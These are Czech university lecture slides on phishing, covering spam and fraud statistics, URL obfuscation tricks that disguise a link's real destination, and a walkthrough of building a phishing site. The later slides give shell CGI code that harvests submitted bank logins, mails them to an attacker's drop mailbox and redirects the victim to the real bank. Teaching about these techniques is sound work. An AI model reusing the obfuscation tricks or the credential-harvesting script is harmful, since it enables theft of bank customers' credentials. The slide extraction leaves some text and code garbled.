! Počítačové viry a bezpečnost počítačových systémů Phishing prof. Ing. Ivan Zelinka, Ph.D. Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba Czech Republic! Email: ivan.zelinka@vsb.cz www.ivanzelinka.eu Phone: +420 57 603 5192 GSM: +420 775 161 965 prof. Ing. Ivan Zelinka, Ph.D. http://www.ivanzelinka.eu/hp/vyuka.html
Schéma přednášky
Schéma přednášky
Pishing V roce 2004 byly téměř 2 miliony občanů USA vystaveny útoku virtuálních zločinců Celkové ztráty dosáhly téměř 2 miliard dolarů phishingové e-mailů stoupá (např. v r. 2005 během 6. měsících o 4 000 procent Podle společnosti Symantec, poskytovatele antispamové technologie, tvořil spam 63 procenta ze 2,93 miliardy e-mailů zachycených softwarem společnosti Brightmail AntiSpam V polovině července roku 2004 zablokovaly filtry firmy Brightmail AntiSpam 9 milionů pokusů o phishing týdně. Tento počet v prosinci 2004 přesáhl 33 miliony zablokovaných zpráv týdně
Pishing průběhu 24 hodin v březnu 2005 bylo 10 z 12 e-mailů oficiálně zařazeno jako spam a každá 82. zpráva v sobě skrývala virus Pokud alespoň 1 ze 100 000 příjemců skutečně zareaguje na pobídku Klepněte sem", která se objevuje ve spamech, mají spammeři dostatečný finanční stimul k tomu, aby rozeslali dalších 5 milionů spamových zpráv Phishing představuje podskupinu kategorie spamu. Mezi hlavní identifikační rysy patří: nástroj pro hromadnou poštu a jeho vlastnosti zvyky v oblasti odesílání pošty včetně konkrétních stylů a rozvrhů, ale nejen jich druh systému používaného pro rozesílání spamu (v počítači, kde se e-maily vytvářejí) druh systému používaného pro umístění phishingového serveru v struktura nepřátelského phishingového serveru včetně využívání HTML, JS, PHP a jiných skriptů
Pishing
Spam - pishing Nevyžádaná obchodní elektronická pošta (UCE) Neodpovídající obchodní elektronická pošta (NCE) Producenti seznamů Samy Scamy tvoří největší část spamu. Jejich účelem je získání významných finančních prostředků prostřednictvím oklamání uživatelů. Mezi podskupiny scamu patří 419 (scam nigerijského typu), malware a phishing.
Pishing Podle Internet Storm Center vydrží čistá schránka pod Windows bez jakékoli záplaty na Internetu odolávat průměrně 20 minut Pishing je definován jako primitivní metoda, jako způsob odeslání falšovaného e-mailupříjemci, který klamavým způsobem napodobuje legální instituci s úmyslem vyzvědět od příjemce důvěrné informace jako číslo platební karty nebo heslo k bankovnímu účtu. Takový e-mail většinou navádí uživatele, aby navštívil nějaké webové stránky a zadal zde tyto důvěrné informace. Tyto stránky mají design podobný jako instituce, za kterou se scammer vydává, aby získal vaši důvěru. Stránky této instituci samozřejmě nepatří a výsledkem je ukradení vašich důvěrných údajů za účelem finančního zisku. Proto je slovo phishing evidentně variací na slovo fishing (rybaření), kde scammer nakazuje háčky" v naději, že se do nich pár jeho obětí zakousne".
Pishing Příklad : matení oka Jednoduchým příkladem je wuw.citibank.com@www.google.com. Webový prohlížeč přečte pravou stranu adresy a přejde na Google. Symbol @ v prohlížeči většinou indikuje uživatelské jméno a heslo, podobně jako u FTP. V případě, že se nezadá, je bezvýznamný. FTP přihlášení ve webovém prohlížeči může vypadat nějak takhle: ftp://username:pass@ftp.site.com. Aby to phisher ještě více zkomplikoval, zmate URL jeho nečitelným zakódováním. To lze provést mnoha způsoby. Nejdříve vyhledáme IP adresu pro Google, která je např. 216.239.57.104 Dále konvertujme řetězec do DWord (Double Word). Word je normální počet bitů, který je vyhovující pro provádění operací u konkrétní architektury. U architektury Intel je tímto počtem 16 bitů, takže Double Word bude 32 bitů a uvádí se v desetinné podobě. Matematicky se konverze IP adresy do DWord provede takto: (216*256+239)*(256+57)*(256+104) = 3639556456, čímž nás http://3639556456 dostane na google.com
Pishing Lze zadat www.citibank.com@36395 56456/ a jsme na google.com Dále to lze ještě více zkomplikovat, šestnáctkový kód pro @ je 40. V případě URL se pro indikaci šestnáctkového kódu použije předpona %. Pakdostaneme www.citibank.com%403639556456/
Co není phish Scam typu Nigerian 419 Tento scam, známý také jako advanced fee fraud, podvod typu vymáhání zálohového poplatku nebo také scam Ponzi, mezi nás přišel ještě před začátkem 80. let. Přichází ve formě faxu, dopisu nebo e-mailu. Podvodná internetová aukce Tyto scamy čítají až 64 % veškerých internetových podvodů a jsou hlavním druhem podvodu používaného na internetu (Internet Fraud Complaint Center, www.ifccfbi.org)
Phish statistika Na Jednu hromadnou zásilku čítající 100 000 e-mailů přijme až 10 % příjemců a vynese okolo 1 % obětí. Phishers našli využití pro každý účet, který získají: od praní špinavých peněz k odcizení, podvodům a krádežím identity. Phishers zdokonalují svoje metody v oblasti key-loggingového malwaru (zaznamenávání stisku kláves). Místo sběru dat ze všech webových stránek vyhledávají data z jednotlivých URL a využívají i faktor botnetu a vyzbrojují se sami pomocí distribuovaných serverů po celém světě. Trojské koně jako Trojan.BankAsh nakazí soubory hostitelského počítače a berou si je na nepravé bankovní weby za účelem ukradení dat jejich uživatelů. Phishers využívají zranitelnost v rámci Cross-Site Scripting2 (XSS), možnosti přesměrování URL a jakékoli způsoby vykořisťování spojené s prohlížeči, které jim umožní provádět útoky za účelem získání informací o uživatelích.
Phish statistika Běžná metoda odhadu velikosti hromadné zásilky potřebuje využít shromážděné e-mailové adresy: Vytvořte skupinu e-mailových adres, které budete využívat pouze pro potřeby spamu. Obecně se jí říká spamový účet typu honeypot (úmyslně nezabezpečený systém, který umožňuje monitorovat podezřelou aktivitu). Provedte distribuci těchto e-mailových adres do nižných míst. Tento proces se nazývá rozsévání, protože adresy z honeypotu se sází" do různých fór. Vyčkejte, dokud účty nezačnou přijímat spamy. Může to trvat hodiny i měsíce, podle daného fóra. phishing představuje 0,5 % veškerého spamu, nebo zhruba 25 milionů e-mailů každý den.
Phish statistika úspěšnosti phishingu: téměř 50 % možných obětí - lidí, kteří klepnou na odkaz v e-mailu - se objeví během prvních 24 hodin po odeslání hromadné pošty v téměř 50 % možných obětí se objeví během dalších 24 hodin po odeslání hromadné pošty méně než 1 procento možných obětí vstoupí na stránku po 48 hodinách Phishingové servery, které se uzavřou během 24 hodin, mohou omezit míru návratnosti na polovinu. Naopak phishingové servery, které se neodstaví do 48 hodin, se vystavují 50% riziku, že budou během následujícího měsíce použity pro jiný phishingový útok. Doba mezi opětovným použitím se mění podle phishingových skupin - některé skupiny používají servery okamžitě znovu, jiné čekají s návratem týdny.
Phish statistika S během první hodiny po odeslání hromadné pošty může být až 20 % přístupů na phishingový server ze strany antiphishingových organizací. V logu to lze najít podle typu prohlížeče (wget je zřejmá indikace antiphishingové organizace) a IP adresy. Především IP adresa může vést ke známé antiphishingové skupině. V téměř 80 procent antiphishingových skupin, které na server vstoupí, tak činí během prvních 12 hodin. Po 48 hodinách patří téměř všechny přístupy antiphishingovým skupinám. Jsou to pravděpodobně skupiny, které ověřují, zda je server stále aktivní.
Falešná identita - zrcadlo V tomto kroku se pomocí SW robota provede stažení vybrané webové stránky. Povšimněte si souboru robots.txt, který slouží k zamezení přístupu robotů k vybraným částem stránek. Platí pouze pro roboty splňující normu RES-Robot Exclusion Standard.
Obsah souboru robot.txt může být například: Falešná identita - zrcadlo
Falešná identita - nastavení pishingového serveru
Falešná identita - založení anonymní schránky Všimli jste si, že jediný nepropojený odkaz vede na cgi/login.cgi? Je to náš hlavní cíl, protože zpracovává důvěrné přihlašovací údaje pro celou stránku. Nemáme přístup ke kódu cílové stránky pro Login.cgi, takže si vybudujeme svůj vlastní. Tento modifikovaný soubor Login.cgi provede dvě hlavní akce: zaznamená přihlašovací údaje, odešle je do naší anonymní schránky a zároveň odešle MITM POST zpátky na stránku s uživatelskými údaji a v zásadě se přihlásí místo něj. Tato technika MITM byla užita phishery, kteří se zaměřili na PayPal, je to diskrétní způsob, jak podfouknout oběť, aniž by si byla něčeho vědoma, jelikož jsme napojeni zpět na skutečný cíl a uživatel bude přihlášen.
Falešná identita - založení anonymní schránky #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" sed-e 's@.*/cgi/@/cgi/@'' # Give CGI header and start web page echo "Status: 301 Moved Content- Type: text/html Location: http://${rserver}${uri} <html> <body> This page has moved to <a href=\"http://${rserver}${uri}\">http://${rserver}${request JJRI}</a> </body> </html>" Tento kód vezme URI z REQUEST_URI a odstraní vše až k /cgi/(za předpokladu, že /cgi/ je obsaženo v URÍ) a předává výsledky do URI.
Falešná identita - založení anonymní schránky pro zachycení dat použijeme e-mailovou adresu jako naši anonymní schránku, pro ukázku použijme blind_drop@securescience.net. SENDER=stolen_data@securescience.net RECIPIENT=blind_drop@securescience.net POSTDATA='echo "${URI}" sed -e ' s/\/cgi\/login.cgi?//'' cat «! /usr/lib/sendmail -t From: ${SENDER} To: ${RECIPIENT} ${POSTDATA}!
Falešná identita - příprava phishingového e-mailu
Útok přesměrováním Pro phishingovou techniku přesměrování je standardním postupem sběr dat a přesměrování oběti na skutečnou stránku. Jedná se o jeden ze sofistikovanějších způsobů phishingového útoku, jelikož neexistuje žádná sběrná webová stránka, žádné obrázky a na jediném použitém serveru běží jen přesměrovací skript. Uživatel je vyzván k zadání svých přihlašovacích informací přímo do e-mailové zprávy. Tento způsob phishingu je velmi populární na ebay, PayPal a elektronických obchodech jako např. Amazon. Od takových společností mnohem pravděpodobněji obdržíte e-mail ohledně výhod a nově nabízených služeb, takže napodobení postupu, který je pohodlnější pro zákazníky elektronických obchodů, je pochopitelné.